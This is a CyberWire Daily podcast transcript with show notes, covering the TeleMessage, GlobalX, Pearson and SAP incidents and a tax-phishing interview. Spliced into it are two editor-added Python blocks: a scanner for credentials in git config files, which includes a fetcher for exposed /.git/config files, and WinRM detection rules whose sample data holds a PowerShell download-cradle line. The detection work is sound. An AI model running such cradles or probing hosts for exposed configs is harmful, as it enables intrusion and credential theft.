CyberWire Daily - Scrutinizing the security of messaging apps continues.
Episode Date: May 9, 2025

The messaging app used by CBP and the White House faces continued security scrutiny. Hacktivists breach the airline used for U.S. deportation flights. The FBI warns that threat actors are exploiting outdated, unsupported routers. Education giant Pearson confirms a cyberattack. Researchers report exploitation of Windows Remote Management (WinRM) for stealthy lateral movement in Active Directory (AD) environments. A sophisticated email attack campaign uses malicious PDF invoices to deliver a cross-platform RAT. A zero-day vulnerability in SAP NetWeaver enables remote code execution. An Indiana health system reports a data breach affecting nearly 263,000 individuals. Our guest is Alex Cox, Director of Information Security at LastPass, discussing tax-related lures targeting refunds. AI empowers a murder victim to speak from beyond the grave.

Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn.

CyberWire Guest
Today we are joined by Alex Cox, Director of Information Security at LastPass, to discuss tax-related lures facing both tax preparation agencies and filers expecting refunds.
Selected Reading
On the state of modern Web Application Security (BrightTalk)
Customs and Border Protection Confirms Its Use of Hacked Signal Clone TeleMessage (Wired)
Hackers hit deportation airline GlobalX, leak flight manifests, and leave an unsubtle message for "Donnie" Trump (Bitdefender)
FBI Sounds Alarm on Rogue Cybercrime Services Targeting Obsolete Routers (Infosecurity Magazine)
Education giant Pearson hit by cyberattack exposing customer data (Bleeping Computer)
Hackers Using Windows Remote Management to Stealthily Navigate Active Directory Network (Cybersecurity News)
Hackers Weaponizing PDF Invoices to Attack Windows, Linux & macOS Systems (Cybersecurity News)
SAP Zero-Day Targeted Since January, Many Sectors Impacted (Security Week)
Indiana Health System Notifies 263,000 of Oracle Hack (BankInfoSecurity)
A Judge Accepted AI Video Testimony From a Dead Man (404 Media)

Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show.

Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info.

The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
You're listening to the CyberWire Network powered by N2K.
Hey everybody, Dave here.
Join me and my guests, Outpost24's Laura Enriquez and Michelo Steppa, on Tuesday, May 13th at noon Eastern time for a live discussion on the biggest threats hitting web applications today and what you can do about them. We're going to talk about why attackers still love web apps in 2025, the latest threat trends shaping the security landscape, how to spot and prioritize critical vulnerabilities fast, along with scalable, practical steps to strengthen your defenses. Again, the webinar is Tuesday, May 13th for our live conversation on the state of modern web application security. You can register now by visiting events.thecyberwire.com. That's events.thecyberwire.com. We'll see you there.
And now a word from our sponsor, SpyCloud. Identity is the new battleground, and attackers are exploiting stolen identities to infiltrate
your organization.
Traditional defenses can't keep up.
SpyCloud's holistic identity threat protection helps security teams uncover and automatically
remediate hidden exposures across your users from breaches, malware, and phishing to neutralize
identity-based threats like account takeover, fraud and ransomware.
Don't let invisible threats compromise your business.
Get your free corporate darknet exposure report at spycloud.com slash cyberwire and see what attackers already know.
That's spycloud.com slash cyberwire.
The messaging app used by CBP and the White House faces continued security scrutiny. Hacktivists breach the airline used for US deportation flights.
The FBI warns that threat actors are exploiting outdated, unsupported routers.
Education giant Pearson confirms a cyber attack.
Researchers report exploitation of Windows Remote Management for stealthy
lateral movement in Active Directory environments.
A sophisticated email attack campaign uses malicious PDF invoices to deliver a cross-platform RAT.
A zero-day vulnerability in SAP NetWeaver enables remote code execution.
An Indiana health system reports a data breach affecting nearly 263,000 individuals.
Our guest is Alex Cox, Director of Information Security
at LastPass, discussing tax-related lures
targeting refunds.
And AI empowers a murder victim to speak from beyond the grave. It's Friday, May 9th, 2025.
I'm Dave Bittner and this is your CyberWire Intel Briefing. Happy Friday and thanks for joining us here today. The US Customs and Border Protection confirmed it uses at least one app from TeleMessage,
a service that clones popular messaging apps like Signal and WhatsApp, but adds archiving
features for compliance.
Following a detected cyber incident, CBP disabled the app.
TeleMessage, now owned by US-based Smarsh, paused all services amid investigations into
multiple security breaches and flaws in its Android app's source code.
A recent photo showed former National Security Advisor
Mike Waltz using the app, appearing to chat with officials,
including Vice President JD Vance.
Senator Ron Wyden has urged the DOJ to investigate,
calling the software a national security risk.
Despite being a federal contractor,
TeleMessage's consumer apps aren't approved under FedRAMP.
The full scope of government use remains unclear.
Hacktivists claiming ties to Anonymous breached GlobalX Airlines,
a U.S. government contractor used for deportation flights, stealing flight records, passenger lists, and months of itinerary data.
They defaced the airline's website with a political message and a Guy Fawkes mask image,
criticizing the company's role in deportations.
The hackers contacted journalists and leaked data showing details of flights deporting
hundreds of Venezuelan migrants, some mid-flight while legal challenges were still pending.
According to 404 Media, the hackers accessed
GlobalX's AWS cloud by exploiting a developer token
and retrieving access keys.
They also reportedly sent messages to pilots
using a flight operations tool
and accessed the company's GitHub.
The breach highlights several security lapses.
As of now, neither GlobalX nor U.S. immigration officials have commented.
The FBI has warned that threat actors are exploiting outdated, unsupported routers,
likely from brands like Cisco's Linksys and Ericsson's Cradlepoint, using
unpatched vulnerabilities and remote management software. Hackers bypassed
authentication to gain shell access, installed malware, and turn the devices
into part of a botnet. These compromised routers were then used as proxies via
the Anyproxy and 5Socks networks, helping criminals hide their activities.
Malware communications included a two-way handshake with a command and control server.
While no specific group was named, the FBI noted that Chinese cyber actors have exploited similar vulnerabilities in the past.
Users are urged to replace old routers or disable
remote access. This alert follows the release of OpenEOX, a proposed standard to better
manage end-of-life disclosures for tech products.
UK-based education giant Pearson confirmed a cyberattack in which threat actors stole corporate and consumer
data mostly described as legacy data.
The breach reportedly stemmed from an exposed GitLab personal access token in a public .git
config file, allowing attackers to access source code and embedded cloud credentials.
Over months, they allegedly exfiltrated terabytes of data from AWS, Google
Cloud, and services like Salesforce and Snowflake. Pearson says no employee data was stolen and
is continuing its investigation.
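The Pearson exposure described above comes down to a git config file, reachable from the web, with a personal access token inside a remote URL. The scanner below is an added example by the editor, not code from the podcast, from Pearson or from the reporting cited in the show notes. It parses the config the way git writes it, flags any credential embedded in a remote URL, matches the public prefixes of GitLab personal access tokens (glpat-), GitHub classic tokens (ghp_) and AWS access key IDs (AKIA), and reports whether an HTTP response body looks like a served .git/config. The config text and the token in it are constructed; the fetch helper is the only part that touches the network and is not exercised offline.

```python
"""Scanner for credentials left in git config files.

Added example for this page; not code from the podcast, Pearson or the cited
reporting. SAMPLE_CONFIG below is constructed; the token it contains is fake.
"""
import re
import urllib.request
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Public prefixes of token formats that commonly end up in .git/config or in
# committed files (GitLab PAT, GitHub classic PAT, AWS access key ID).
TOKEN_PATTERNS = {
    "gitlab_pat": re.compile(r"\bglpat-[A-Za-z0-9_-]{20,}"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36,}"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
}


def parse_git_config(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal parser for git's INI-like config format.

    Returns {section: {key: value}}, with subsections folded into the section
    name the way git prints them (e.g. 'remote "origin"'). Keys are lowercased
    because git treats them case-insensitively.
    """
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        header = re.match(r'^\[([^\s"\]]+)(?:\s+"([^"]*)")?\]$', line)
        if header:
            name, sub = header.group(1).lower(), header.group(2)
            current = name if sub is None else f'{name} "{sub}"'
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        sections[current][key.lower()] = value
    return sections


def find_secrets(text: str) -> List[dict]:
    """Report credentials embedded in remote URLs and any known token formats.

    Token values are truncated in the findings so the report itself does not
    become another copy of the secret.
    """
    findings: List[dict] = []
    for section, entries in parse_git_config(text).items():
        for key, value in entries.items():
            if key in ("url", "pushurl"):
                parts = urlsplit(value)
                if parts.password:  # https://user:secret@host/... form
                    findings.append({
                        "section": section, "key": key,
                        "kind": "credential_in_url",
                        "user": parts.username, "host": parts.hostname,
                    })
            for kind, pattern in TOKEN_PATTERNS.items():
                for match in pattern.finditer(value):
                    findings.append({
                        "section": section, "key": key, "kind": kind,
                        "token_prefix": match.group(0)[:10] + "...",
                    })
    return findings


def is_exposed_git_config(body: str) -> bool:
    """True when an HTTP response body parses as a real git config.

    A web root that serves /.git/config exposes the repository metadata,
    including any credentials in remote URLs.
    """
    return "repositoryformatversion" in parse_git_config(body).get("core", {})


def fetch_git_config(base_url: str, timeout: float = 5.0) -> Optional[str]:
    """Fetch <base_url>/.git/config; returns the body or None if not served."""
    try:
        with urllib.request.urlopen(base_url.rstrip("/") + "/.git/config",
                                    timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except Exception:  # connection errors, 404s and TLS failures all mean "not served"
        return None


# Constructed sample: a config with a fake GitLab token in the origin URL.
SAMPLE_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tbare = false
[remote "origin"]
\turl = https://oauth2:glpat-EXAMPLEtoken1234567890ab@gitlab.example.com/acme/app.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[remote "mirror"]
\turl = git@github.com:acme/app.git
[credential "https://gitlab.example.com"]
\thelper = store
"""

if __name__ == "__main__":
    for finding in find_secrets(SAMPLE_CONFIG):
        print(finding)
```

Run against the sample it reports the origin remote twice, once as a credential in the URL and once as a GitLab token match; the same two checks over a clone's real .git/config, or over the body returned by fetch_git_config for each of your web roots, are the quick version of the audit this story argues for. Tokens in remote URLs are the ones git never warns you about, because git wrote them there when someone cloned with the token in the URL.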
Researchers at Practical Security Analytics report that threat actors are increasingly
exploiting Windows Remote Management for stealthy lateral movement in Active Directory environments.
WinRM, used for legitimate remote administration via PowerShell, becomes a powerful tool for
attackers once they obtain valid credentials through phishing, brute force, or credential
dumping. Using WinRM commands like Invoke-Command,
attackers scan for accessible systems on ports 5985 and 5986,
authenticate remotely, and execute malicious payloads
under normal-looking processes.
Advanced techniques including PowerShell cradles
and reflective .NET loaders allow payloads to run entirely in memory,
bypassing AMSI and logging.
The researchers outline a typical attack chain, starting with initial access and reconnaissance, and recommend restricting WinRM access, monitoring anomalies, and enhancing
endpoint detection to catch misuse of this native Windows tool.
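The story above lists the attacker's moves (Invoke-Command over 5985/5986, PowerShell cradles, reflective .NET loaders) and the defender's to-do list (monitor anomalies, improve endpoint detection). The following is an added example by the editor of what that detection can look like; it is not code from the podcast or from Practical Security Analytics. It runs three rules over constructed events in an assumed, simplified schema (a subset of the fields in Windows Security event 4688, process creation, and PowerShell event 4104, script block logging; the field names are this example's, not the Windows XML names): a process whose parent is wsmprovhost.exe, the host process for remote PowerShell sessions, was started through WinRM; a logged script block matches cradle, encoded-command or in-memory-loader patterns; and one account spawning WinRM children on several hosts, which is the lateral-movement signal itself.

```python
"""Detections for WinRM-based lateral movement, run over sample events.

Added example for this page; not code from the podcast or from the research it
summarizes. Events use a simplified, assumed schema (a subset of the fields in
Windows Security event 4688, process creation, and PowerShell event 4104,
script block logging); the field names are this example's, not Windows'.
SAMPLE_EVENTS are constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Children an interactive admin rarely spawns through a WinRM session but
# attackers routinely do (LOLBins, script hosts, plain cmd).
SUSPICIOUS_CHILDREN = {"cmd.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
                       "certutil.exe", "wscript.exe", "cscript.exe"}

# Indicators of download cradles, encoded commands and in-memory .NET loading.
CRADLE_PATTERNS = [
    re.compile(r"\b(iex|invoke-expression)\b", re.I),
    re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    re.compile(r"frombase64string", re.I),
    re.compile(r"\[(system\.)?reflection\.assembly\]::load", re.I),
    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_winrm_child(event: Dict) -> Optional[Dict]:
    """4688 whose parent is wsmprovhost.exe: a process started over WinRM."""
    if event.get("event_id") != 4688:
        return None
    if basename(event.get("parent_process", "")) != "wsmprovhost.exe":
        return None
    child = basename(event["new_process"])
    return {
        "rule": "winrm_remote_exec", "host": event["host"], "user": event["user"],
        "child": child,
        "severity": "high" if child in SUSPICIOUS_CHILDREN else "medium",
    }


def detect_cradle(event: Dict) -> Optional[Dict]:
    """4104 script block matching download-cradle or in-memory-loader patterns."""
    if event.get("event_id") != 4104:
        return None
    hits = [p.pattern for p in CRADLE_PATTERNS if p.search(event.get("script_block", ""))]
    if not hits:
        return None
    return {
        "rule": "powershell_cradle", "host": event["host"], "user": event["user"],
        "indicators": len(hits),
        "severity": "high" if len(hits) >= 2 else "medium",
    }


def detect_fan_out(events: List[Dict], threshold: int = 3) -> List[Dict]:
    """One account driving WinRM-spawned processes on many hosts: lateral movement."""
    hosts_by_user: Dict[str, set] = defaultdict(set)
    for event in events:
        if detect_winrm_child(event) is not None:
            hosts_by_user[event["user"].lower()].add(event["host"].lower())
    return [
        {"rule": "winrm_fan_out", "user": user, "hosts": sorted(hosts), "severity": "high"}
        for user, hosts in hosts_by_user.items() if len(hosts) >= threshold
    ]


def run_detections(events: List[Dict]) -> List[Dict]:
    """Apply the per-event rules, then the cross-host rule."""
    alerts: List[Dict] = []
    for event in events:
        for rule in (detect_winrm_child, detect_cradle):
            alert = rule(event)
            if alert:
                alerts.append(alert)
    alerts.extend(detect_fan_out(events))
    return alerts


# Constructed sample: one admin doing routine work, one service account
# fanning out across three hosts and pulling payloads into memory.
WSMPROV = r"C:\Windows\System32\wsmprovhost.exe"
SAMPLE_EVENTS = [
    {"event_id": 4688, "host": "WS01", "user": r"CORP\admin.jane",
     "parent_process": WSMPROV, "new_process": r"C:\Windows\System32\whoami.exe"},
    {"event_id": 4688, "host": "WS02", "user": r"CORP\svc-backup",
     "parent_process": WSMPROV, "new_process": r"C:\Windows\System32\cmd.exe"},
    {"event_id": 4688, "host": "WS03", "user": r"CORP\svc-backup",
     "parent_process": WSMPROV, "new_process": r"C:\Windows\System32\rundll32.exe"},
    {"event_id": 4688, "host": "FS01", "user": r"CORP\svc-backup",
     "parent_process": WSMPROV, "new_process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"event_id": 4688, "host": "WS01", "user": r"CORP\admin.jane",
     "parent_process": r"C:\Windows\explorer.exe", "new_process": r"C:\Windows\notepad.exe"},
    {"event_id": 4104, "host": "WS02", "user": r"CORP\svc-backup",
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"},
    {"event_id": 4104, "host": "WS01", "user": r"CORP\admin.jane",
     "script_block": "Get-Service | Where-Object Status -eq 'Running'"},
    {"event_id": 4104, "host": "FS01", "user": r"CORP\svc-backup",
     "script_block": "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($b))"},
]

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

Two prerequisites that the rules silently assume: 4688 events only exist where process creation auditing is turned on (with command-line auditing if you want the arguments too), and 4104 events only exist where PowerShell script block logging is enabled. Without both, a WinRM session that stays in memory leaves little on the endpoint beyond the wsmprovhost.exe process itself, which is exactly the gap the story describes. The fan-out rule is the one worth tuning first, because a single admin running Invoke-Command against a server fleet looks the same; an allowlist of admin accounts or jump hosts keeps it useful.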
Researchers at Fortinet have uncovered a sophisticated email attack campaign using malicious PDF
invoices to deliver a cross-platform remote access trojan called Ratty.
While primarily targeting Windows, the malware also affects Linux and macOS systems running Java.
The attack starts with deceptive emails that pass SPF validation using the ServicioDeCorreo.es service,
luring victims into clicking buttons in the PDF that launch a multistage infection.
The process uses Dropbox and MediaFire to host files, ngrok tunneling, and geofencing
to evade detection. Victims in Italy receive a Java-based JAR file, while others see harmless
documents, fooling email scanners. Once active, Ratty enables attackers to execute commands,
log keystrokes, and access webcams and files.
The campaign highlights how attackers combine social engineering
and advanced evasion to bypass security and maintain persistent access.
A critical zero-day vulnerability in SAP NetWeaver has been exploited by threat actors to compromise
hundreds of systems worldwide, enabling remote code execution.
Onapsis and Mandiant began tracking attacks as early as January, with active exploitation
confirmed before SAP issued patches on April 24.
Attackers deployed web shells and executed commands to maintain access,
targeting industries from energy to government.
Onapsis warns that attackers possess deep SAP knowledge
and urges immediate patching, compromise assessment, and updated detection measures.
Union Health System in Indiana has reported a data breach affecting nearly 263,000 individuals
linked to a January cyberattack on legacy Cerner systems during a migration to Oracle's
cloud.
The compromised data includes sensitive patient information, such as social security
numbers, medical records, and insurance details. The breach, confirmed by Oracle in March,
did not impact Union Health's live systems. Lawsuits allege negligence by both Union Health
and Oracle, and claim a threat actor named Andrew is extorting affected hospitals.
Oracle denies a breach of its cloud infrastructure, but acknowledged unauthorized access to outdated
servers.
While Oracle will cover credit monitoring costs, it won't notify individuals directly.
Union Health is offering free credit protection and is facing mounting legal pressure over its handling of the incident.
Coming up after the break, my conversation with Alex Cox, Director of Information Security at LastPass, we're discussing tax-related lures targeting refunds,
and AI empowers a murder victim to speak from beyond the grave.
Stay with us.
Traditional pen testing is resource intensive, slow and expensive, providing
only a point-in-time snapshot of your application security, leaving it
vulnerable between development cycles. Automated scanners alone are unreliable
in detecting faults within application logic and critical vulnerabilities.
Outpost24's continuous pen testing as a service solution offers year-round protection,
with recurring manual penetration testing conducted by Crest-certified pen testers,
allowing you to stay ahead of threats and ensure your web applications are always secure.
We've all been there.
You realize your business needs to hire someone yesterday.
How can you find amazing candidates fast?
Well, it's easy.
Just use Indeed.
When it comes to hiring, Indeed is all you need.
Stop struggling to get your job post noticed.
Indeed's Sponsored Jobs helps you stand out and hire fast.
Your post jumps to the top of search results so the right candidates see it first.
And it works.
Sponsored jobs on Indeed get 45% more applications than non-sponsored ones.
One of the things I love about Indeed is how fast it makes hiring.
And yes, we do actually use Indeed for hiring here at N2K Cyberwire.
Many of my colleagues here came to us through Indeed.
Plus, with sponsored jobs there are no subscriptions, no long-term contracts,
you only pay for results. How fast is Indeed? Oh, in the minute or so that I've been talking
to you, 23 hires were made on Indeed, according to Indeed data worldwide. There's no need
to wait any longer, speed up your hiring right now with Indeed. And listeners to this show will get a $75 sponsored job credit to get your jobs more visibility at indeed.com slash cyberwire.
Just go to indeed.com slash cyberwire right now and support our show by saying you heard
about Indeed on this podcast. Indeed.com slash cyberwire. Terms and conditions apply. Hiring? Indeed is all you need.
Our guest is Alex Cox, Director of Information Security at LastPass. We're discussing tax-related lures targeting refunds.
So I'm glad we get to catch up here today
because there's a flurry of activity
and I think on people's minds as we come up to tax season,
which of course here in the US is in April.
But then on the other side of that,
I think a lot of times people get their guard down
and you and your colleagues at LastPass are saying, maybe not so fast.
There's still some things that need your attention.
Yeah, yeah, absolutely.
So tax season is just like any other significant time of the year, be it a holiday or some
deadline or what have you.
And what I typically tell people is that the bad guys are entrepreneurial and opportunistic,
so they will use any one of these things as lures to accomplish their goals.
They adapt to current news, they adapt to holiday cycles.
So what we see every year come tax time is, you know, these typical, you know, tax season type attacks.
The thing that's really interesting that sort of developed over the past probably five or
six years is, you know, you've heard this about this move from these smaller kind of
intrusion attempts to what the bad guys are doing now, which is big game hunting, right?
They're going to go for a much bigger firm to attempt to get access to a lot more data.
Over the past five or six years, we've seen that in the tax season area too.
Instead of a bad guy attacking an individual taxpayer, which they still do, they may also
go after a CPA firm or a tax preparation agency or a big online tax company.
The idea there being that I get into that firm, I've got access to a whole bunch of
people rather than just those onesie twosies that I'm targeting individually. So this time of year,
what sort of things are you seeing? Does it have to do with things like refunds? Yeah, I mean, so
if you think about if I'm a tax preparation agency or I'm an individual submitting my tax return or tax
information, that's kind of like an open book to your life, right?
It's got your employer, it's got your address, it's potentially got your relatives, it's
got identifying information about you.
The bad guys can then take that and do what they want to do with it.
They can apply for loans, they can do various fraud.
We've actually seen them get fake tax returns
through the IRS.
So they'll pretend to be you, submit their tax return,
get a tax return, and then off they go with your money.
And then the IRS comes after you and says,
hey, you made a mistake, give us our money back.
So yeah, it's really interesting and kind of varied
the way the bad guys act around this time of year.
And I suppose they're looking for bank account access,
trying to pretend like they need to direct deposit things
and stuff like that?
Yeah, I mean, so if you think about what you can do
with say somebody's social security number
and their banking info and that sort of thing,
they could do everything from social engineer their way
into your bank account. But with that sort of information, they might also be able to social engineer their way into an email account or, you know, some online account.
And, you know, what's very common is when you get this, this base source of identity information for a person, the bad guys are good about leveraging that for multiple things.
So it's kind of a, you know, here's one piece of info that's going to get me into a lot of places.
You know, we are in, I'd say it's fair to say, a bit of a chaotic situation in Washington, DC.
There's a lot of uncertainty with organizations like the IRS. Are the bad guys taking advantage of that uncertainty? Some of the things like layoffs that we've seen with those kinds of agencies?
Yeah, I mean, so anytime you see, you know, a reduction in cybersecurity
capability, the bad guys typically watch the good guys and, you know, they pay
attention to that sort of thing. So I would not be at all surprised to see, you
know, bad guys, you know, looking after that and taking care of that, you know,
taking advantage of that particular situation. The other thing that's playing
a part now is AI and the use of AI with the bad guys.
We see a lot of bad guys doing phishing checks.
Here, I'm going to do this phishing message.
Let me put it into chat GPT and make sure it makes sense because maybe I'm not an English
speaker and I can make it sound like believable English by putting it through chat GPT.
What we see is these messages that people send you
are still very, the bad guys send you are very believable
when it comes to the way that the language is used.
There are still some technical means to detect
if they're good or bad, but the use of English language
because of AI has gotten much, much better.
So suppose I'm the security professional at my organization, and I want to go down the
hall and talk to my chief financial officer, maybe some folks in HR who are taking care
of payroll or those kinds of things.
What sort of topics should I be bringing up with them for them to have on their radar?
Yeah, I mean, so what I always tell people is, you know, be suspicious, right?
When you get that text message that says, hey, this is the IRS, you know, you owe us
money, look a little closer at it, right?
So I'll give you an example.
I had a friend send me one this morning and she said, hey, is this, you know, is this
phishing?
And I looked at it and it was very believable from the USPS, you know, apparently.
But the domain was a .cc domain. So, you know,
.cc is Cocos Island in Australia. The IRS or USPS is probably not going to use that infrastructure.
You know, they're probably going to use a .com or .us or something in the US.
Right. You know, so being kind of suspicious there. The other thing I tell people is,
you know, especially when it comes to tax information, if the IRS wants to get ahold of you,
they're gonna do so in many different ways, right?
So maybe you will get a text message, you know,
at some point, because you do get text messages
that say, hey, your federal return has been accepted.
If you go to the IRS website,
you'll also see your tax info there, right?
If you look in your mailbox,
you probably will get a letter from the IRS as well.
So it's one of those like,
okay, here's the single point of info.
Let me see if I can verify it in other places.
But yeah, I think largely just being very suspicious,
as to any single point of information
that you just sort of suddenly get out of nowhere,
be suspicious of it.
Just going broader now,
folks like you and your colleagues there at LastPass
who are in the password manager business, what
part do offerings like yours play in this?
Not just the ones that you do, but your competitors, what sort of safety and mitigations do people
enjoy from having that extra layer?
Yeah, so really I think the most important thing with a password manager is that you're
able to create unique passwords for each site that you use.
And the reason that's important is when the bad guys get a hold of, you know, say a trove of username and passwords, you know, they'll take Alex.cox at whatever and password fluffy.
And they'll try that in 50, 100 different sites to see if you've reused that same password over and over again.
So when you use a password manager and you're creating those individual complex passwords,
if the bad guys get a hold of one of those, they just have access to one site.
They don't have access to everything.
So that's the main advantage for me is that here I can create this unique password for
every single site.
I don't have to remember them.
They'd be very hard to guess and it just kind of increases your security that way.
The other thing I'll add is something I've noticed is that
it can catch if I'm at a look-alike site.
I'll say, hey, I want to log in here, and it'll say, wait a minute, that's not...
We're not actually at Microsoft. We're not actually at Facebook or wherever else.
So hang on there.
Yeah, there are varying ways to approach that problem.
One of the things that we do in LastPass
is if you're going to paste your information
into someplace that LastPass hasn't seen before,
it'll actually pop up with a little note that says,
you're about to paste some info into the site.
Are you sure you want to do that?
So it gives you that little bit of security,
that little bit of second check
to make sure you're doing what you intend to do.
But yeah, absolutely, being able to detect those sites
that aren't actually the sites that you have in your vaults
is a pretty important feature.
Let's be real, navigating security compliance can feel like assembling Ikea furniture without
the instructions.
You know you need it, but it takes forever and you're never quite sure if you've done
it right.
That's where Vanta comes in.
Vanta is a trust management platform
that automates up to 90% of the work for frameworks
like SOC 2, ISO 27001, and HIPAA,
getting you audit ready in weeks, not months.
Whether you're a founder, an engineer,
or managing IT and security for the first time,
Vanta helps you prove your security posture
without taking over your life. More
than 10,000 companies, including names like Atlassian and Quora, trust Vanta to monitor
compliance, streamline risk, and speed up security reviews by up to five times. And
the ROI? A recent IDC report found Vanta saves businesses over half a million dollars a year
and pays for itself in just three months.
For a limited time, you can get a thousand dollars off Vanta at vanta.com slash cyber.
That's vanta.com slash cyber.
And finally, our Speaking from Beyond the Grave desk tells us of the story of an Arizona
courtroom that just heard from a murder victim, but not in the usual way. Christopher
Pelkey was shot and killed in a 2021 road rage incident. At the
sentencing, an AI-generated version of him took the stand. That's
right, his sister built an avatar using AI and voice cloning tools.
It looked and sounded like Chris, and it spoke directly
to the man who killed him. The avatar forgave the shooter. It said they could have been
friends.
The judge was moved. The defense even quoted the avatar. The family said their goal was
to bring Chris back, to humanize him. And it worked.
No one objected.
It was all labeled as AI.
Still, it raises big questions.
Tech gave a voice to the dead, and that voice helped decide a sentence.
As powerful as this moment was, we should tread carefully before letting digital ghosts shape real-world justice.
And that's the CyberWire. For links to all of today's stories, check out our daily briefing
at thecyberwire.com.
A quick program note, you can join me for a live webinar Tuesday, May 13th. It's titled
On the State of Modern Web Application Security. Join me and Outpost24's Laura Enriquez and Michelo Steppa on May 13th, 12 p.m. Eastern Time for this live webinar that dives into the biggest threats hitting web applications today, the latest threat trends shaping the security landscape, how to spot and prioritize critical vulnerabilities fast,
along with scalable practical steps to strengthen your defenses.
Again, the webinar is titled On the State of Modern Web Application Security,
Tuesday at noon Eastern time.
We'll have a link to register in the show notes.
Be sure to check out this weekend's research Saturday,
and my conversation
with Lucija Valentić from ReversingLabs. The research is titled Atomic and Exodus Crypto Wallets
Targeted in Malicious NPM Campaign. That's Research Saturday. Check it out. We'd love to know what you
think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead
in the rapidly changing world of cybersecurity. If you like our show, please share a rating
and review in your favorite podcast app. Please also fill out the survey in the show notes
or send an email to cyberwire at n2k.com. N2K's senior producer is Alice Carruth, our
cyberwire producer is Liz Stokes. We're mixed by Trey Hester with original music and sound design by Elliot Peltzman.
Our executive producer is Jennifer Eiben, Peter Kilpe is our publisher, and I'm Dave Bittner.
Thanks for listening.
We'll see you back here, next week.
What's the common denominator in security incidents?
Escalations and lateral movement.
When a privileged account is compromised, attackers can seize control of critical assets.
With bad directory hygiene and years of technical debt, identity attack paths are easy targets
for threat actors to exploit, but hard for defenders
to detect. This poses risk in Active Directory, Entra ID, and hybrid configurations. Identity
leaders are reducing such risks with attack path management. You can learn how attack path
management is connecting identity and security teams while reducing risk with BloodHound Enterprise,
powered by SpecterOps.
Head to specterops.io today to learn more.
SpecterOps. See your attack paths the way adversaries do.